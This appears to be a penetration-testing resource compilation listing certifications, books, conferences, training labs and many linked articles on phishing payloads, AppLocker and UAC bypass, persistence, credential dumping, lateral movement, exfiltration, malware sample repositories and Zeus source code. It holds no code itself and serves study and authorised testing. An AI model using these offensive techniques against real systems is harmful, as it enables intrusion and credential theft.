This is an ongoing compilation of resources we have found helpful and tools we use.
- Introduction
- Table of Contents
- Resources
- Tools Used
- Our Open Source Software
-
- Penetration Testing OS Distributions
- Multi-paradigm Frameworks
- Training Utilities and Resources
- Network Reconnaissance Tools
- Network Vulnerability Scanners
- Web Vulnerability Scanners
- Web Exploitation
- Network Tools
- Protocol Analyzers and Sniffers
- Proxies and MITM Tools
- Wireless Network Tools
- Transport Layer Security Tools
- Cryptography
- Post-Exploitation
- Exfiltration Tools
- Static Analyzers
- Dynamic Analyzers
- Hex Editors
- File Format Analysis Tools
- Anti-Virus Evasion Tools
- Hash Cracking Tools
- Windows Utilities
- GNU Linux Utilities
- macOS Utilities
- Social Engineering Tools
- OSINT Tools
- Anonymity Tools
- Reverse Engineering Tools
- Side-channel Tools
- Forensic Tools
- Memory Analysis
- Incident Response
- Honeypot Tools
- Monitoring and IDS-IPS
- Other
- Kali Linux Certified Professional (KLCP) (https://home.pearsonvue.com/kali)
- CompTIA Security+ (https://certification.comptia.org/certifications/security)
- Certified Ethical Hacker (https://www.eccouncil.org/programs/certified-ethical-hacker-ceh/)
- Certified Penetration Testing Engineer (CPTE) (https://mile2.com/penetration-testing-ethical-hacking/cpte.html)
- GIAC Security Essentials (GSEC) (https://www.giac.org/certification/security-essentials-gsec)
- Offensive Security Certified Professional (OSCP) (https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/)
- Offensive Security Wireless Professional (OSWP) (https://www.offensive-security.com/information-security-certifications/oswp-offensive-security-wireless-professional/)
- Offensive Security Certified Expert (OSCE) (https://www.offensive-security.com/information-security-certifications/osce-offensive-security-certified-expert/)
- Offensive Security Exploitation Expert (OSEE) (https://www.offensive-security.com/information-security-certifications/osee-offensive-security-exploitation-expert/)
- Offensive Security Web Expert (OSWE) (https://www.offensive-security.com/information-security-certifications/oswe-offensive-security-web-expert/)
- Certified Information Systems Security Professional (CISSP) (https://www.isc2.org/Certifications/CISSP)
- Kali Linux Revealed (https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf)
- CompTIA Security+ SY0-501 Certification Study Guide (https://certification.comptia.org/training/self-study/books/security-sy0-501-study-guide)
- Advanced Penetration Testing: Hacking the World's Most Secure Networks
- CEH Certified Ethical Hacker All-in-One Exam Guide
- Penetration Testing: A Hands-On Introduction to Hacking
- The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws
- Hacking: The Art of Exploitation
- The Beginner's Guide to Information Security
- Essentials of Cybersecurity
- Essentials of Enterprise Network Security (https://res.cloudinary.com/peerlyst/image/upload/v1499385854/post-attachments/Essentials_of_Enterprise_Network_Security_wiqsvc.pdf)
- CISSP: Certified Information Systems Security Professional Study Guide
- CISSP (ISC)2 Certified Information Systems Security Professional Official Study Guide
- CISSP All-in-One Exam Guide
- The Shellcoder's Handbook: Discovering and Exploiting Security Holes
- The Cyber Skill Gap
- A Bug Hunter's Diary: A Guided Tour Through the Wilds of Software Security
- The Art of Deception: Controlling the Human Element of Security
- Practical Malware Analysis: A Hands-On Guide to Dissecting Malicious Software
- Windows Internals
- The IDA Pro Book: The Unofficial Guide to the World's Most Popular Disassembler
- Black Hat Python: Python Programming for Hackers and Pentesters
- Understanding Cryptography: A Textbook for Students and Practitioners
- Hacking Exposed 7
- Blue Team Handbook: Incident Response Edition: A condensed field guide for the Cyber Security Incident Responder
- Cybersecurity - Protecting Critical Infrastructures from Cyber Attack and Cyber Warfare
- Cybersecurity and Cyberwar: What Everyone Needs to Know
- TCP/IP Illustrated
- Web Application Vulnerabilities: Detect, Exploit, Prevent
- Thinking Security: Stopping Next Year's Hackers
- Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon
- Cyber War: The Next Threat to National Security and What to Do About It
- Cyberspies: The Secret History of Surveillance, Hacking, and Digital Espionage
- Cybersecurity and Human Rights in the Age of Cyberveillance
- Bulletproof SSL and TLS: Understanding and Deploying SSL/TLS and PKI to Secure Servers and Web Applications
- We Are Anonymous: Inside the Hacker World of LulzSec, Anonymous, and the Global Cyber Insurgency
- Ghost in the Wires: My Adventures as the World's Most Wanted Hacker
- Future Crimes: Inside the Digital Underground and the Battle for Our Connected World
- Worm: The First Digital World War
- Spam Nation: The Inside Story of Organized Cybercrime-from Global Epidemic to Your Front Door
- Reversing: Secrets of Reverse Engineering
- Rtfm: Red Team Field Manual
- Linux Shell Scripting Cookbook
- A Short Course on Computer Viruses
- Protection and Security on the Information Superhighway
- AVIEN Malware Defense Guide for the Enterprise
- The Ncsa Guide to PC and Lan Security
- Applied Cryptography: Protocols, Algorithms and Source Code in C
- Cryptography Engineering: Design Principles and Practical Applications
- The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography
- The Art of Computer Virus Research and Defense
- Information Assurance Handbook: Effective Computer Security and Risk Management Strategies
- The Hacker Playbook: Practical Guide To Penetration Testing
- Applied Network Security Monitoring: Collection, Detection, and Analysis
- Security Metrics, A Beginner's Guide
- Network Security Through Data Analysis: Building Situational Awareness
- Protecting Your Internet Identity: Are You Naked Online?
- Hacked Again
- The Computer Incident Response Planning Handbook: Executable Plans for Protecting Information at Risk
- The Tao of Network Security Monitoring: Beyond Intrusion Detection
- Surreptitious Software: Obfuscation, Watermarking, and Tamperproofing for Software Protection
- Secure Programming HOWTO (https://dwheeler.com/secure-programs/Secure-Programs-HOWTO/index.html)
- Network Forensics: Tracking Hackers through Cyberspace
- The Art of Memory Forensics
- Practice of Network Security Monitoring
- SANS Annual Conference
- Cyber Threat Intelligence Summit
- SANS Pen Test Annual Conferences
- SANS Security Annual Conferences
- Security Operations Summit & Training
- AppSecUSA
- Infosecurity North America
- Infosecurity Europe
- AppSec United States (OWASP National Conference)
- RSA Conference United States
- IEEE Symposium on Security & Privacy
- ISF Annual World Congress
- ISACA Cyber Security Nexus
- DerbyCon 8.0
- CSO50 Conference
- Infosecurity Europe
- Securi-Tay
- Nullcon Conference
- CanSecWest
- InfoSec World
- IAPP Global Privacy Summit
- ISSA International Conference
- InfoSec Southwest
- Infiltrate
- Atlantic Security Conference (AtlSecCon)
- SOURCE Annual Conferences
- Secure360 Conference
- AFCEA Defensive Cyber Operations Symposium
- HACKMIAMI
- Ignite
- FIRST Conference
- Black Hat United States
- DEF CON
- USENIX Security Symposium
- 44CON London
- Hacker Halted - Optionally includes certification-specific training
- SecTor Canada
- BruCON
- DeepSec
- (ISC)2 Secure Event Series
- IANS Information Security Forums
- ISSA CISO Executive Forum Series
- secureCISO
- BSides Event Series
- CISO Executive Summit Series (Invite-only)
- SecureWorld
- HOPE
- HITB
- Black Hat
- BSides
- CCC
- DerbyCon
- PhreakNIC
- ShmooCon
- CarolinaCon
- SummerCon
- Hack.lu
- Hack3rCon
- ThotCon
- LayerOne
- SkyDogCon
- SECUINSIDE
- DefCamp
- Nullcon
- Swiss Cyber Storm
- Virus Bulletin Conference
- Ekoparty
- 44Con
- BalCCon
- FSec
- Offensive Security Part 1 - Basics of Penetration Testing (https://www.youtube.com/watch?v=GX1go9PDnWY)
- Dennis Maldonado: Are We Really Safe? Bypassing Access Control Systems (https://www.youtube.com/watch?v=jTtdTrMSsPw)
- Phishing Campaigns in Metasploit Pro (https://www.youtube.com/watch?v=XReMP6_f2xU)
- Internet of Things: The Relationship Between IoT and Security (https://www.youtube.com/watch?v=LcoEe0LvaBo)
- Internet of Things: IoT Research Methodology (https://www.youtube.com/watch?v=iQCaGxnY4LM)
- Rapid7 Whiteboard Wednesday Series (https://www.youtube.com/playlist?list=PLMrgKzfE1aINBOpJXCkqPdWcT7YCPZYL3)
- Spear Phishing with Cobalt Strike (https://www.youtube.com/watch?v=V7UJjVcq2Ao)
- Introduction to Metasploit: Exploiting Web Applications (https://www.slideshare.net/DennisMaldonado5/metasploit-for-web-workshop)
- Are We Really Safe? Hacking Access Control Systems (https://www.slideshare.net/DennisMaldonado5/hacking-access-control-systems)
- OWASP Social Engineering: The Art of Human Hacking (https://www.owasp.org/images/5/54/Presentation_Social_Engineering.pdf)
- Weaponizing Data Science for Social Engineering: Automated E2E Spear Phishing on Twitter (https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Seymour-Tully-Weaponizing-Data-Science-For-Social-Engineering-WP.pdf)
- Colbalt Strike - Spear Phishing documentation (https://www.cobaltstrike.com/help-spear-phish)
- Cobalt Strike - What's the go-to phishing technique or exploit? (https://blog.cobaltstrike.com/2014/12/17/whats-the-go-to-phishing-technique-or-exploit/)
- Excel Macros With PowerShell (https://4sysops.com/archives/excel-macros-with-powershell/)
- PowerPoint and Custom Actions (https://cofense.com/powerpoint-and-custom-actions/)
- Macro-less Code Exec in MSWord (https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/)
- Multi-Platform Macro Phishing Payloads (https://medium.com/@malcomvetter/multi-platform-macro-phishing-payloads-3b688e8eff68)
- Abusing Microsoft Word Features for Phishing: "subDoc" (https://rhinosecuritylabs.com/research/abusing-microsoft-word-features-phishing-subdoc/)
- Phishing Against Protected View (https://enigma0x3.net/2017/07/13/phishing-against-protected-view/)
- PowerShell Empire Stagers 1: Phishing With an Office Macro and Evading AVs (https://fzuckerman.wordpress.com/2016/10/06/powershell-empire-stagers-1-phishing-with-an-office-macro-and-evading-avs/)
- The Absurdly Underestimated Dangers of CSV Injection (http://georgemauer.net/2017/10/07/csv-injection.html)
- Cell Injection (http://blog.7elements.co.uk/2013/01/cell-injection.html)
- Comma Separated Vulnerabilities (https://www.contextis.com/blog/comma-separated-vulnerabilities)
- Spear Phishing 101 (https://blog.inspired-sec.com/archive/2017/05/07/Phishing.html)
- Defense In Depth (https://oddvar.moe/2017/09/13/defense-in-depth-writeup/)
- Microsoft Office - NTLM Hashes via Frameset (https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/)
- Windows Oneliners to Download Remote Payload and Execute Arbitrary Code (https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
- ClickOnce (Twice or Thrice): A Technique for Social Engineering and (Un)trusted Command Execution (https://bohops.com/2017/12/02/clickonce-twice-or-thrice-a-technique-for-social-engineering-and-untrusted-command-execution/)
- WSH Injection: A Case Study (https://posts.specterops.io/wsh-injection-a-case-study-fd35f79d29dd)
- Intro to Using GScript for Red Teams (http://lockboxx.blogspot.com/2018/02/intro-to-using-gscript-for-red-teams.html)
- Hiding Registry Keys with PSReflect (https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353)
- Persistence Using RunOnceEx - Hidden from Autoruns.exe (https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/)
- Persistence Using Globalflags In Image File Execution Options - Hidden from Autoruns.exe (https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/)
- Putting Data In Alternate Data Streams and How to Execute It (https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/)
- WMI Persistence with Cobalt Strike (https://blog.inspired-sec.com/archive/2017/01/20/WMI-Persistence.html)
- Leveraging INF-SCT Fetch & Execute Technique For Bypass, Evasion, & Persistence (https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/)
- Leveraging INF-SCT Fetch & Execute Technique For Bypass, Evasion, & Persistence (https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/)
- Vshadow: Abusing the Volume Shadow Service for Evasion, Persistence, and Active Directory Database Extraction (https://bohops.com/2018/02/10/vshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction/)
- First Entry: Welcome and Fileless UAC Bypass (https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/)
- Exploiting Environment Variables in Scheduled Tasks for UAC Bypass (https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html)
- Bypassing UAC Using App Paths (https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/)
- "Fileless" UAC Bypass Using sdclt.exe (https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/)
- Windows Privilege Escalation checklist (https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md)
- Ultimate AppLocker ByPass List (https://github.com/api0cradle/UltimateAppLockerByPassList)
- Empire Without PowerShell (https://bneg.io/2017/07/26/empire-without-powershell-exe/)
- PowerShell Without PowerShell - How To Bypass Application Whitelisting, Environment Restrictions & AV (https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/)
- Code Signing Certificate Cloning Attacks and Defenses (https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec)
- Userland API Monitoring and Code Injection Detection (https://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565)
- In-Memory Evasion (https://blog.cobaltstrike.com/2018/02/08/in-memory-evasion/)
- Bypassing AMSI via COM Server Hijacking (https://posts.specterops.io/bypassing-amsi-via-com-server-hijacking-b8a3354d1aff)
- Process Doppleganging - A New Way to Impersonate A Process (https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/)
- Week of Evading Microsoft ATA (http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html)
- Putting Data in Alternate Data Streams and How to Execute It (https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/)
- AppLocker - Case Study - How Insecure Is It Really? Part 1 (https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/)
- AppLocker - Case Study - How Insecure Is It Really? Part 2 (https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/)
- Harden Windows With AppLocker - Based on Case Study Part 1 (https://oddvar.moe/2017/12/13/harden-windows-with-applocker-based-on-case-study-part-1/)
- Harden Windows With AppLocker - Based on Case Study Part 2 (https://oddvar.moe/2017/12/21/harden-windows-with-applocker-based-on-case-study-part-2/)
- Office 365 Safe Links Bypass (https://oddvar.moe/2018/01/03/office-365-safe-links-bypass/)
- Windows Defender Attack Surface Reduction Rules Bypass (https://oddvar.moe/2018/03/15/windows-defender-attack-surface-reduction-rules-bypass/)
- Bypassing Device Guard UMCI Using CHM - CVE-2017-8625 (https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/)
- Bypassing Application Whitelisting With BGinfo (https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/)
- Cloning and Hosting Evil Captive Portals Using a Wi-Fi Pineapple (https://blog.inspired-sec.com/archive/2017/01/10/cloning-captive-portals.html)
- Loading Alternate Data Stream (ADS) DLL/CPL Binaries to Bypass AppLocker (https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/)
- Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts (https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/)
- mavinject.exe Functionality Deconstructed (https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e)
- Windows Access Tokens and Alternate Credentials (https://blog.cobaltstrike.com/2015/12/16/windows-access-tokens-and-alternate-credentials/)
- Bringing the Hashes Home With reGeorg & Empire (https://sensepost.com/blog/2016/bringing-the-hashes-home-with-regeorg-empire/)
- Intercepting Passwords With Empire and Winning (https://sensepost.com/blog/2016/intercepting-passwords-with-empire-and-winning/)
- Local Administrator Password Solution (LAPS) - Part 1 (https://rastamouse.me/2018/03/laps---part-1/)
- Local Administrator Password Solution (LAPS) - Part 2 (https://rastamouse.me/2018/03/laps---part-2/)
- Using a SCF File to Gather Hashes (https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/)
- harmj0y Presentations and Blogs - Windows and Active Directory Exploitation (https://www.harmj0y.net/blog/)
- Offensive Encrypted Data Storage (https://www.harmj0y.net/blog/redteaming/offensive-encrypted-data-storage/)
- Practical Guide to NTLM Relaying in 2017 (https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
- Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync (https://adsecurity.org/?p=2053)
- Dumping Domain Password Hashes (https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/)
- Red Team Operating in a Modern Environment (https://www.owasp.org/images/4/4b/Red_Team_Operating_in_a_Modern_Environment.pdf)
- My First Go with BloodHound (https://blog.cobaltstrike.com/2016/12/14/my-first-go-with-bloodhound/)
- Introducing BloodHound (https://wald0.com/?p=68)
- A Read Teamer's Guide to GPOs and OUs (https://wald0.com/?p=179)
- Automated Derivative Administrator Search (https://wald0.com/?p=14)
- A Pentester's Guide to Group Scoping (https://www.harmj0y.net/blog/activedirectory/a-pentesters-guide-to-group-scoping/)
- Local Group Enumeration (https://www.harmj0y.net/blog/redteaming/local-group-enumeration/)
- The PowerView PowerUsage Series #1 - Mass User Profile Enumeration (http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-1/)
- The PowerView PowerUsage Series #2 - Mapping Computer Shortnames With the Global Catalog (http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-2/)
- The PowerView PowerUsage Series #3 - Enumerating GPO Edit Rights In a Foreign Domain (http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-3/)
- The PowerView PowerUsage Series #4 - Finding Cross-Trust ACEs (http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-4/)
- Aggressor PowerView (https://threat.tevora.com/aggressor-powerview/)
- Lay of the Land with Bloodhound (https://threat.tevora.com/lay-of-the-land-with-bloodhound/)
- Scanning for Active Directory Privileges & Privileged Accounts (https://adsecurity.org/?p=3658)
- Microsoft LAPS Security & Active Directory LAPS Configuration Recon (https://adsecurity.org/?p=3164)
- Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation (https://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/)
- SPN Discovery (https://pentestlab.blog/2018/06/04/spn-discovery/)
- A Citrix Story (https://rastamouse.me/2017/05/a-citrix-story/)
- Jumping Network Segregation with RDP (https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/)
- From Pass-the-Hash to Pass-the-Ticket with No Pain (https://resources.infosecinstitute.com/pass-hash-pass-ticket-no-pain/)
- Abusing DNSAdmins Privilege for Escalation in Active Directory (http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html)
- Using SQL Server for Attacking a Forest Trust (http://www.labofapenetrationtester.com/2017/03/using-sql-server-for-attacking-forest-trust.html)
- Extending BloodHound for Red Teamers (https://www.youtube.com/watch?v=Pn7GWRXfgeI)
- OPSEC Considerations for Beacon Commands (https://blog.cobaltstrike.com/2017/06/23/opsec-considerations-for-beacon-commands/)
- Kerberos Party Tricks: Weaponizing Kerberos Protocol Flaws (http://www.exumbraops.com/blog/2016/6/1/kerberos-party-tricks-weaponizing-kerberos-protocol-flaws)
- Lateral Movement Using Excel Application and docm (https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/)
- The Most Dangerous User Right You (Probably) Have Never Heard Of (https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/)
- Agentless Post-Exploitation (https://www.youtube.com/watch?v=QbjuO5IlpBU)
- A Guide to Attacking Domain Trusts (https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)
- Pass-the-Hash is Dead: Long Live LocalAccountTokenFilterPolicy (https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/)
- Targeted Kerberoasting (https://www.harmj0y.net/blog/activedirectory/targeted-kerberoasting/)
- Kerberoasting Without Mimikatz (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
- Abusing GPO Permissions (https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
- Abusing Active Directory Permissions with PowerView (https://www.harmj0y.net/blog/redteaming/abusing-active-directory-permissions-with-powerview/)
- Roasting AS-REPs (https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/)
- Getting the Goods with CrackMapExec: Part 1 (https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html)
- Getting the Goods with CrackMapExec: Part 2 (https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html)
- DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction (https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
- Abusing Exported Functions and Exposed DCOM Interfaces for Pass-Thru Command Execution and Lateral Movement (https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/)
- A Guide to Attacking Domain Trusts (https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944)
- Outlook Home Page - Another Ruler Vector (https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/)
- Outlook Forms and Shells (https://sensepost.com/blog/2017/outlook-forms-and-shells/)
- Abusing the COM Registry Structure: CLSID, LocalServer32, & ImprocServer32 (https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/)
- LethalHTA - A New Lateral Movement Technique Using DCOM and HTA (https://codewhitesec.blogspot.com/2018/07/lethalhta.html)
- Abusing DCOM For Yet Another Lateral Movement Technique (https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/)
- Accessing Clipboard From the Lock Screen in Windows 10 Part 1 (https://oddvar.moe/2017/01/24/accessing-clipboard-from-the-lock-screen-in-windows-10/)
- Accessing Clipboard From the Lock Screen in Windows 10 Part 2 (https://oddvar.moe/2017/01/27/access-clipboard-from-lock-screen-in-windows-10-2/)
- DNS Data Exfiltration - What is This and How to Use? (https://blog.fosec.vn/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822)
- DNS Tunnelling (https://resources.infosecinstitute.com/dns-tunnelling/)
- sg1: swiss army knife for data encryption, exfiltration & covert communication (https://securityonline.info/sg1-swiss-army-knife/)
- Data Exfiltration Over DNS Request Covert Channel: DNSExfiltrator (https://n0where.net/data-exfiltration-over-dns-request-covert-channel-dnsexfiltrator)
- Data Exfiltration via Formula Injection (https://www.notsosecure.com/data-exfiltration-formula-injection/)
- Empire Domain Fronting (https://www.xorrior.com/Empire-Domain-Fronting/)
- Escape and Evasion Egressing Restricted Networks (https://www.optiv.com/blog/escape-and-evasion-egressing-restricted-networks)
- Simple Domain Fronting PoC with GAE C2 Server (https://www.securityartwork.es/2017/01/31/simple-domain-fronting-poc-with-gae-c2-server/)
- Domain Fronting Via Cloudfront Alternate Domains (https://www.mdsec.co.uk/2017/02/domain-fronting-via-cloudfront-alternate-domains/)
- Finding Domain Frontable Azure Domains (https://theobsidiantower.com/2017/07/24/d0a7cfceedc42bdf3a36f2926bd52863ef28befc.html)
- Red Team Insights on HTTPS Domain Fronting Google Hosts Using Cobalt Strike (https://www.cyberark.com/threat-research-blog/red-team-insights-https-domain-fronting-google-hosts-using-cobalt-strike/)
- How I Identified 93k Domain-Frontable CloudFront Domains (https://www.peew.pw/blog/2018/2/22/how-i-identified-93k-domain-frontable-cloudfront-domains)
- Validated CloudFront SSL Domains (https://medium.com/@vysec.private/validated-cloudfront-ssl-domains-27895822cea3)
- CloudFront Hijacking (https://www.mindpointgroup.com/blog/pen-test/cloudfront-hijacking/)
- Using robots.txt to Locate Your Targets (http://www.behindthefirewalls.com/2013/07/using-robotstxt-to-locate-your-targets.html)
- How to Obfuscate JacaScript in Metasploit (https://github.com/rapid7/metasploit-framework/wiki/How-to-obfuscate-JavaScript-in-Metasploit)
- Awesome Lockpicking (https://github.com/meitar/awesome-lockpicking)
- Awesome CTF (https://github.com/apsdehal/awesome-ctf)
- android-security-awesome (https://github.com/ashishb/android-security-awesome)
- Awesome Bug Bounty (https://github.com/djadmin/awesome-bug-bounty)
- Awesome Yara (https://github.com/InQuest/awesome-yara)
- Awesome ICS Security (https://github.com/hslatman/awesome-industrial-control-system-security)
-
Exploit-DB (https://www.exploit-db.com/)
-
0day.today (https://0day.today/)
-
Packet Storm Security (https://packetstormsecurity.com/)
-
Awesome CVE PoC (https://github.com/qazbnm456/awesome-cve-poc)
-
InfoSec - CERT-PA (https://infosec.cert-pa.it/analyze/submission.html)
-
Contagio (http://contagiodump.blogspot.com/)
-
MalwareDB (http://malwaredb.malekal.com/)
-
MalShare (https://malshare.com/)
-
theZoo (https://github.com/ytisf/theZoo)
-
Tracker h3x (http://tracker.h3x.eu/)
-
vduddu malware repo (https://github.com/vduddu/Malware)
-
VirusBay (https://beta.virusbay.io/)
-
VirusSign (http://www.virussign.com/)
-
VirusShare (https://virusshare.com/)
-
VX Vault (http://vxvault.net/ViriList.php)
-
Zeus Trojan source code (https://github.com/Visgean/Zeus)
- Red Teaming
- Web Security
- Hacking Resources
- Lockpicking
- PenTesting
- Exploit Development
- Hacking
- Also Hacking
- Incident Response
- Honeypot
- Malware Analysis
- Capture The Flag
- Security
- Application Security
- Android Security Analysis
- CVE Proof of Concepts
- Penetration Testing - Supported by Netsparker
- Bug Bounty
- YARA
- Security Talks
- Industrial Control System Security
- Forensics
- Packet Capture Tools
- Threat Intelligence
- Hacking Lists
- SecLists - Useful security related lists to reference/work off of in a pentest
- Parrot Security OS - Distribution similar to Kali using the same repositories, but with additional features such as Tor and I2P integration.
- Kali - GNU/Linux distribution designed for digital forensics and penetration testing.
- ArchStrike - Arch GNU/Linux repository for security professionals and enthusiasts.
- BlackArch - Arch GNU/Linux-based distribution for penetration testers and security researchers.
- Network Security Toolkit (NST) - Fedora-based bootable live operating system designed to provide easy access to best-of-breed open source network security applications.
- BackBox - Ubuntu-based distribution for penetration tests and security assessments.
- Buscador - GNU/Linux virtual machine that is pre-configured for online investigators.
- Fedora Security Lab - Provides a safe test environment to work on security auditing, forensics, system rescue and teaching security testing methodologies.
- The Pentesters Framework - Distro organized around the Penetration Testing Execution Standard (PTES), providing a curated collection of utilities that eliminates often unused toolchains.
- AttifyOS - GNU/Linux distribution focused on tools useful during Internet of Things (IoT) security assessments.
- Metasploit - Software for offensive security teams to help verify vulnerabilities and manage security assessments.
- Armitage - Java-based GUI front-end for the Metasploit Framework.
- Faraday - Multiuser integrated pentesting environment for red teams performing cooperative penetration tests, security audits, and risk assessments.
- ExploitPack - Graphical tool for automating penetration tests that ships with many pre-packaged exploits.
- Pupy - Cross-platform (Windows, Linux, macOS, Android) remote administration and post-exploitation tool.
- AutoSploit - Automated mass exploiter, which collects target by employing the Shodan.io API and programmatically chooses Metasploit exploit modules based on the Shodan query.
- Rupture - Multipurpose tool capable of man-in-the-middle attacks, BREACH attacks and other compression-based crypto attacks.
- Mobile Security Framework (MobSF) - Automated mobile application pentesting framework capable of static analysis, dynamic analysis, malware analysis, and web API testing.
- Damn Vulnerable Web Application (DVWA) - Purposely vulnerable PHP/MySQL web application.
- OWASP Damn Vulnerable Web Sockets (DVWS) - Vulnerable web application which works on web sockets for client-server communication.
- OWASP NodeGoat - Includes Node.js web applications for learning the OWASP top 10.
- OWASP SecurityShepard - Web and mobile application security training platform.
- OWASP Juice Shop - JavaScript based intentionally insecure web application.
- CPTE Courseware Kit - Official training kit for CPTE exam.
- OSCP-like Vulnhub VMs - Intentionally vulnerable VMs resembling OSCP.
- Over the Wire: Natas - Web application challenges.
- XSS-game - Cross-site Scripting challenges.
- Hack the Box - Online pentesting labs with Windows VMs.
- RopeyTasks - Simple deliberately vulnerable web application.
- WebGoat - Intentionally insecure web application maintained by OWASP.
- railsgoat - A vulnerable version of Rails that follows the OWASP Top 10.
- Awesome Web Security - Encyclopedia of web security information.
- Awesome Hacking Resources - Self-explanatory.
- Security Cheatsheets
- Corelan.be - Website containing many useful training resources and tutorial.
- Introduction to Software Exploits Part 1 - Online or in-person tutorial covering multiple areas of software exploitation.
- Introduction to Software Exploits Part 2 - Exploitation in the Windows Environment - Online or in-person tutorial covering multiple areas of software exploitation, with emphasis on Windows exploitation.
- How To: Empire's Cross Platform Office Macro - How to utilize Empire's cross-platform malicious MS Office macro.
- Phishing With Empire - Guide on phishing with Empire.
- Phishing With PowerPoint - Guide on getting unsuspecting users to open malicious PPT files.
- Executing Metasploit & Empire Payloads from MS Office Document Properties part 1 - How to stealthily deliver a Metasploit payload via MS Office document properties and a simple macro.
- Executing Metasploit & Empire Payloads from MS Office Document Properties part 2 - Like part 1, but focusing on Empire rather than Metasploit.
- Hack This Site - Learn about web application security by hacking this website.
- Enigma Group - Web application training resource.
- Web Application Security Quiz - 18 question online web app security quiz.
- OpenSecurityTraining.info - Free online training resource.
- PentesterLab - Tiered online training resources.
- Cybrary.it - Free online courses.
- XSS Cheat Sheet
- LFI Cheat Sheet
- Reverse Shell Cheat Sheet
- SQL Injection Cheat Sheet
- Windows Path Traversal Cheat Sheet
- Hacker101 - Online training resource.
- Shodan - Database containing information on all accessible domains on the internet obtained from passive scanning.
- zmap - Open source network scanner that enables researchers to easily perform Internet-wide network studies.
- nmap - Free security scanner for network exploration & security audits.
- Netdiscover - Simple and quick network scanning tool.
- xprobe2 - Open source operating system fingerprinting tool.
- CloudFail - Unmask server IP addresses hidden behind Cloudflare by searching old database records and detecting misconfigured DNS.
- Mass Scan - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
- smbmap - Handy SMB enumeration tool.
- LdapMiner - Multiplatform LDAP enumeration utility.
- ACLight - Script for advanced discovery of sensitive Privileged Accounts - includes Shadow Admins.
- Pentest-Tools - Online suite of various different pentest related tools.
